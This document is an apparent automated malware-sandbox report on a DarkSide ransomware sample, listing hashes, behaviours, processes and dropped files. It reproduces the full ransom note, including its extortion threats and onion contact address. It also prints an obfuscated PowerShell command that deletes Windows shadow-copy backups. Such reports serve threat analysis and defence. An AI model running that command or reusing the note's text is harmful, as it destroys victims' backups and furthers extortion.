Analysis

  • max time kernel
    110s
  • max time network
    109s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    12-05-2021 19:34

General

  • Target

    691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe

  • Size

    59KB

  • MD5

    e44450150e8683a0addd5c686cd4d202

  • SHA1

    8c482a0eed33c8a4542c3cb2715a242f2259343d

  • SHA256

    691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5

  • SHA512

    7d65d22ad630fd77c50e277a44fdcc46fa86235c93524f9751ac9ddf0ce19261707fab631108fc908a71029900dbf6ada119d607edfadc3ce309f86a9c3765fe

Malware Config

Extracted

Path

C:\\README.341d6443.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. We downloaded a lot of interesting data from your network. If you need proofs, we are ready to give it. The data is preloaded and will be automatically published if you don’t pay. Your data will be available after automatic publication for free downloading at least 6 months at our tor cdn servers. If within 3 days you don't contact with us, we will send press-releases about this accident to major media outlets, after another 3 days after sending press-releases we will start to upload your private data. Here is the list of information that we copied from your network: Passports and visas from: DOCUMENTS-RED SEA PROJECT DOCUMENTS-VISIT VISA EMPLOYEES IQAMA & PASSPORTS FOR SWAB TEST SCAN DOCUMENTS Contracts and passports as well as test results for SARS-COV19 from: CONTRACT COVID 19 Status Report Passport and photo Accounting & Financing We also copied information from the following departments: RAKFIN RAKHSE RSPDC RSPFIN RSPQLTP RSPSTO RSPTEC SAJSPFIN RSPQLT RAKEENG We paid a lot of attention to the personal data of employees as well as the drawings of your projects You must understand that if information about your developments gets publicly available: 1) your clients data can be used by criminals 2) your clients will fill lawsuit against you 3) government regulators will fine you for data breach, if you have in clients at least one EU resident then you will be also fined by EU government by GDPR law with millions of dollars of fine or permit ban for working with EU citizents. US has the similar laws, but they are not so costly, however the total cost will exceed the asked amount from you, so our offer is the best deal for you to resolve this issue. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/3NQA47J490NLKJVB1FI43HHCEJO62CE3E440J4H4K564VRQ8AFONVJQOM8158NR3 When you open our website, put the following data in the input form: Key: zm7QxFcBLUS2PdXT2XI4gIg6FuXOMT67rYgWK4ZdNE3jt6R6skLNBCiW7ryVA7ej438jGLsBzZ1mog9YLjglfFG3Ezw57Ks0jJQZMO2AokEchnlupHVbK7ZTlk4kDSMP79vNfLUDI8ppzxNTOtcWQLTtzxCI7zb6ufHXbQe5xQUJvwTJbRVmcNib462NddZoyQ0zjKh8GsEPEfQBCkTtiYR8aVMlr0GBQKzQvDmmBks9y0IupRiKMbGf607vVNegtZXEUFXOfhQfnUwOYUAkX4t83P4eQKbPaFTYpasoEC7Xm0XU1SaX3KAagaqDaIH69YQYZOJZaTrc5NtsPPRH7R1HlOMZP2bC3GMsbLaK91saXy9FcDZpn9AFkVVQHlV9xov5GzZ5GMtxb9QUcpth5a12WpVKpi5wdKNc3H3Q4jNqQjkxUJcM35X9Dkie8LKOYvC039zvnTcClzqhNza6mXhgcd7rGSWQZ6EoJ9yn6LOEf8bwjIoHrGqoYQwS6F7ZWeLd5VtbUGE7iObjGj6vdFjqhKLOxeuNhGx4ZyZ5ZR6e5K7uvLZWmYq !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/3NQA47J490NLKJVB1FI43HHCEJO62CE3E440J4H4K564VRQ8AFONVJQOM8158NR3

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
    "C:\Users\Admin\AppData\Local\Temp\691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1012
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1760

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

    MD5

    5bd2e29a2d14aaddd9d9d103eb145fb5

    SHA1

    52ba8bcb5be9b5527900d74f6e3acc0ed1ad5f50

    SHA256

    00df951a92f5594274b6f91e00a23deca343cb20aa67e63b3b71e5628ebfc6c8

    SHA512

    64e7f6f5da8a6f0d704a81534d6882556df515d1d86a30ef61edbdaedc2a67a45d19011d57b43b7c3dafc56d073a500c62007b2ecbdb109c3ab3ec151c9f96a4

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    MD5

    afff09475943dc7c705d596923642fd2

    SHA1

    962cdef69ac28242732cc3f542cfddecb04f6ea9

    SHA256

    4f6365198885b1c5ca6c7be27a2d1a7151912ffbaa6c9c3ef2b1fd09e7dddab1

    SHA512

    96568da5eaab132003bc8b325ce75838b0020a9702b8ea0442edfc04eac35704d8033ecab448ab2df82b9dc2d585ccc603727b1645680aedf69239d094bfb4e4

  • memory/1012-66-0x0000000002560000-0x0000000002561000-memory.dmp

    Filesize

    4KB

  • memory/1012-63-0x00000000023D0000-0x00000000023D1000-memory.dmp

    Filesize

    4KB

  • memory/1012-64-0x000000001AAB0000-0x000000001AAB1000-memory.dmp

    Filesize

    4KB

  • memory/1012-65-0x0000000002530000-0x0000000002531000-memory.dmp

    Filesize

    4KB

  • memory/1012-67-0x000000001AA30000-0x000000001AA32000-memory.dmp

    Filesize

    8KB

  • memory/1012-68-0x000000001AA34000-0x000000001AA36000-memory.dmp

    Filesize

    8KB

  • memory/1012-69-0x000000001C4C0000-0x000000001C4C1000-memory.dmp

    Filesize

    4KB

  • memory/1012-70-0x000000001B530000-0x000000001B531000-memory.dmp

    Filesize

    4KB

  • memory/1012-62-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp

    Filesize

    8KB

  • memory/1012-61-0x0000000000000000-mapping.dmp

  • memory/1096-60-0x00000000752F1000-0x00000000752F3000-memory.dmp

    Filesize

    8KB